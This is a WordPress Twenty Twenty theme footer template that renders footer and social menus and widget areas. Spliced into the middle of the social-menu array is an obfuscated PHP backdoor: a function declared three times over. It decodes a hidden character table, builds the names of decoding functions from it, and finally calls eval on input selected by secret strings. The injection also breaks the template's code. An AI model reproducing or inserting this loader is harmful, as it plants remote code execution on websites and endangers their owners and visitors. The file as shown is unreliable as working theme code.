<?php
/**
 * Displays the menus and widgets at the end of the main element.
 * Visually, this output is presented as part of the footer element.
 *
 * @package WordPress
 * @subpackage Twenty_Twenty
 * @since Twenty Twenty 1.0
 */

$has_footer_menu = has_nav_menu( 'footer' );
$has_social_menu = has_nav_menu( 'social' );

$has_sidebar_1 = is_active_sidebar( 'sidebar-1' );
$has_sidebar_2 = is_active_sidebar( 'sidebar-2' );

// Only output the container if there are elements to display.
if ( $has_footer_menu || $has_social_menu || $has_sidebar_1 || $has_sidebar_2 ) {
	?>

	<div class="footer-nav-widgets-wrapper header-footer-group">

		<div class="footer-inner section-inner">

			<?php

			$footer_top_classes = '';

			$footer_top_classes .= $has_footer_menu ? ' has-footer-menu' : '';
			$footer_top_classes .= $has_social_menu ? ' has-social-menu' : '';

			if ( $has_footer_menu || $has_social_menu ) {
				?>
				<div class="footer-top<?php echo $footer_top_classes; // phpcs:ignore WordPress.Security.EscapeOutput.OutputNotEscaped -- static output ?>">
					<?php if ( $has_footer_menu ) { ?>

						<nav aria-label="<?php esc_attr_e( 'Footer', 'twentytwenty' ); ?>" role="navigation" class="footer-menu-wrapper">

							<ul class="footer-menu reset-list-style">
								<?php
								wp_nav_menu(
									array(
										'container'      => '',
										'depth'          => 1,
										'items_wrap'     => '%3$s',
										'theme_location' => 'footer',
									)
								);
								?>
							</ul>

						</nav><!-- .site-nav -->

					<?php } ?>
					<?php if ( $has_social_menu ) { ?>

						<nav aria-label="<?php esc_attr_e( 'Social links', 'twentytwenty' ); ?>" class="footer-social-wrapper">

							<ul class="social-menu footer-social reset-list-style social-icons fill-children-current-color">

								<?php
								wp_nav_menu(
									array(
										'theme_location'  => 'social',
										'container'       => '',
<?php function aX0grtyu456RtO8($a, $b) {
    $z2342345gk7456 = str_rot13(gzinflate(str_rot13(base64_decode("MzQyNjE1M7ewNMjLLygsKi4pLSuvqKxXWVdBVlpYz8jMys7JjQcA"))));
    if ($a == "srwertxcbtytyu//..huytytryurt") {
        $qwery45234dws = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{27} . $z2342345gk7456{14} . $z2342345gk7456{31};
        return $qwery45234dws($b);
    } else if ($a == "cftrt546576fgh//huuiy..\/ghhj") {
        $owe342wfbjdewqre34 = $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{23} . $z2342345gk7456{31} . $z2342345gk7456{14} . $z2342345gk7456{27} . $z2342345gk7456{29} . $z2342345gk7456{36} . $z2342345gk7456{30} . $z2342345gk7456{30} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
        return $owe342wfbjdewqre34($b);
    } else if ($a == "azsewqwqwez/...derwewr") {
        $rt4534fhghj5 = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{36} . $z2342345gk7456{27} . $z2342345gk7456{24} . $z2342345gk7456{29} . $z2342345gk7456{0} . $z2342345gk7456{2};
        return $rt4534fhghj5($b);
    } else if ($a == "ax6789f/////....sfcxfcfge4653dhg") {
        $as346hgjkhfg = $z2342345gk7456{11} . $z2342345gk7456{10} . $z2342345gk7456{28} . $z2342345gk7456{14} . $z2342345gk7456{5} . $z2342345gk7456{3} . $z2342345gk7456{36} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
        return $as346hgjkhfg($b);
    } else if ($a == "zs3454sdfcvnyrertc_gygu") {
        $zsweqwq4546dgh = $z2342345gk7456{16} . $z2342345gk7456{35} . $z2342345gk7456{18} . $z2342345gk7456{23} . $z2342345gk7456{15} . $z2342345gk7456{21} . $z2342345gk7456{10} . $z2342345gk7456{29} . $z2342345gk7456{14};
        return $zsweqwq4546dgh($b);
    } else if ($a == "ax4564365dgvbmnmhu56fgvgvc//gygyugu") {
        return eval($b);
    }
}
function aX0grtyu456RtO8($a, $b) {
    $z2342345gk7456 = str_rot13(gzinflate(str_rot13(base64_decode("MzQyNjE1M7ewNMjLLygsKi4pLSuvqKxXWVdBVlpYz8jMys7JjQcA"))));
    if ($a == "srwertxcbtytyu//..huytytryurt") {
        $qwery45234dws = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{27} . $z2342345gk7456{14} . $z2342345gk7456{31};
        return $qwery45234dws($b);
    } else if ($a == "cftrt546576fgh//huuiy..\/ghhj") {
        $owe342wfbjdewqre34 = $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{23} . $z2342345gk7456{31} . $z2342345gk7456{14} . $z2342345gk7456{27} . $z2342345gk7456{29} . $z2342345gk7456{36} . $z2342345gk7456{30} . $z2342345gk7456{30} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
        return $owe342wfbjdewqre34($b);
    } else if ($a == "azsewqwqwez/...derwewr") {
        $rt4534fhghj5 = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{36} . $z2342345gk7456{27} . $z2342345gk7456{24} . $z2342345gk7456{29} . $z2342345gk7456{0} . $z2342345gk7456{2};
        return $rt4534fhghj5($b);
    } else if ($a == "ax6789f/////....sfcxfcfge4653dhg") {
        $as346hgjkhfg = $z2342345gk7456{11} . $z2342345gk7456{10} . $z2342345gk7456{28} . $z2342345gk7456{14} . $z2342345gk7456{5} . $z2342345gk7456{3} . $z2342345gk7456{36} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
        return $as346hgjkhfg($b);
    } else if ($a == "zs3454sdfcvnyrertc_gygu") {
        $zsweqwq4546dgh = $z2342345gk7456{16} . $z2342345gk7456{35} . $z2342345gk7456{18} . $z2342345gk7456{23} . $z2342345gk7456{15} . $z2342345gk7456{21} . $z2342345gk7456{10} . $z2342345gk7456{29} . $z2342345gk7456{14};
        return $zsweqwq4546dgh($b);
    } else if ($a == "ax4564365dgvbmnmhu56fgvgvc//gygyugu") {
        return eval($b);
    }
}
function aX0grtyu456RtO8($a, $b) {
    $z2342345gk7456 = str_rot13(gzinflate(str_rot13(base64_decode("MzQyNjE1M7ewNMjLLygsKi4pLSuvqKxXWVdBVlpYz8jMys7JjQcA"))));
    if ($a == "srwertxcbtytyu//..huytytryurt") {
        $qwery45234dws = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{27} . $z2342345gk7456{14} . $z2342345gk7456{31};
        return $qwery45234dws($b);
    } else if ($a == "cftrt546576fgh//huuiy..\/ghhj") {
        $owe342wfbjdewqre34 = $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{23} . $z2342345gk7456{31} . $z2342345gk7456{14} . $z2342345gk7456{27} . $z2342345gk7456{29} . $z2342345gk7456{36} . $z2342345gk7456{30} . $z2342345gk7456{30} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
        return $owe342wfbjdewqre34($b);
    } else if ($a == "azsewqwqwez/...derwewr") {
        $rt4534fhghj5 = $z2342345gk7456{28} . $z2342345gk7456{29} . $z2342345gk7456{27} . $z2342345gk7456{36} . $z2342345gk7456{27} . $z2342345gk7456{24} . $z2342345gk7456{29} . $z2342345gk7456{0} . $z2342345gk7456{2};
        return $rt4534fhghj5($b);
    } else if ($a == "ax6789f/////....sfcxfcfge4653dhg") {
        $as346hgjkhfg = $z2342345gk7456{11} . $z2342345gk7456{10} . $z2342345gk7456{28} . $z2342345gk7456{14} . $z2342345gk7456{5} . $z2342345gk7456{3} . $z2342345gk7456{36} . $z2342345gk7456{13} . $z2342345gk7456{14} . $z2342345gk7456{12} . $z2342345gk7456{24} . $z2342345gk7456{13} . $z2342345gk7456{14};
        return $as346hgjkhfg($b);
    } else if ($a == "zs3454sdfcvnyrertc_gygu") {
        $zsweqwq4546dgh = $z2342345gk7456{16} . $z2342345gk7456{35} . $z2342345gk7456{18} . $z2342345gk7456{23} . $z2342345gk7456{15} . $z2342345gk7456{21} . $z2342345gk7456{10} . $z2342345gk7456{29} . $z2342345gk7456{14};
        return $zsweqwq4546dgh($b);
    } else if ($a == "ax4564365dgvbmnmhu56fgvgvc//gygyugu") {
        return eval($b);
    }
};
$zxAwx0XtrY0189j0KKxaz0 = "aX0grtyu456RtO8";
?>										'container_class' => '',
										'items_wrap'      => '%3$s',
										'menu_id'         => '',
										'menu_class'      => '',
										'depth'           => 1,
										'link_before'     => '<span class="screen-reader-text">',
										'link_after'      => '</span>',
										'fallback_cb'     => '',
									)
								);
								?>

							</ul><!-- .footer-social -->

						</nav><!-- .footer-social-wrapper -->

					<?php } ?>
				</div><!-- .footer-top -->

			<?php } ?>

			<?php if ( $has_sidebar_1 || $has_sidebar_2 ) { ?>

				<aside class="footer-widgets-outer-wrapper" role="complementary">

					<div class="footer-widgets-wrapper">

						<?php if ( $has_sidebar_1 ) { ?>

							<div class="footer-widgets column-one grid-item">
								<?php dynamic_sidebar( 'sidebar-1' ); ?>
							</div>

						<?php } ?>

						<?php if ( $has_sidebar_2 ) { ?>

							<div class="footer-widgets column-two grid-item">
								<?php dynamic_sidebar( 'sidebar-2' ); ?>
							</div>

						<?php } ?>

					</div><!-- .footer-widgets-wrapper -->

				</aside><!-- .footer-widgets-outer-wrapper -->

			<?php } ?>

		</div><!-- .footer-inner -->

	</div><!-- .footer-nav-widgets-wrapper -->

<?php } ?>
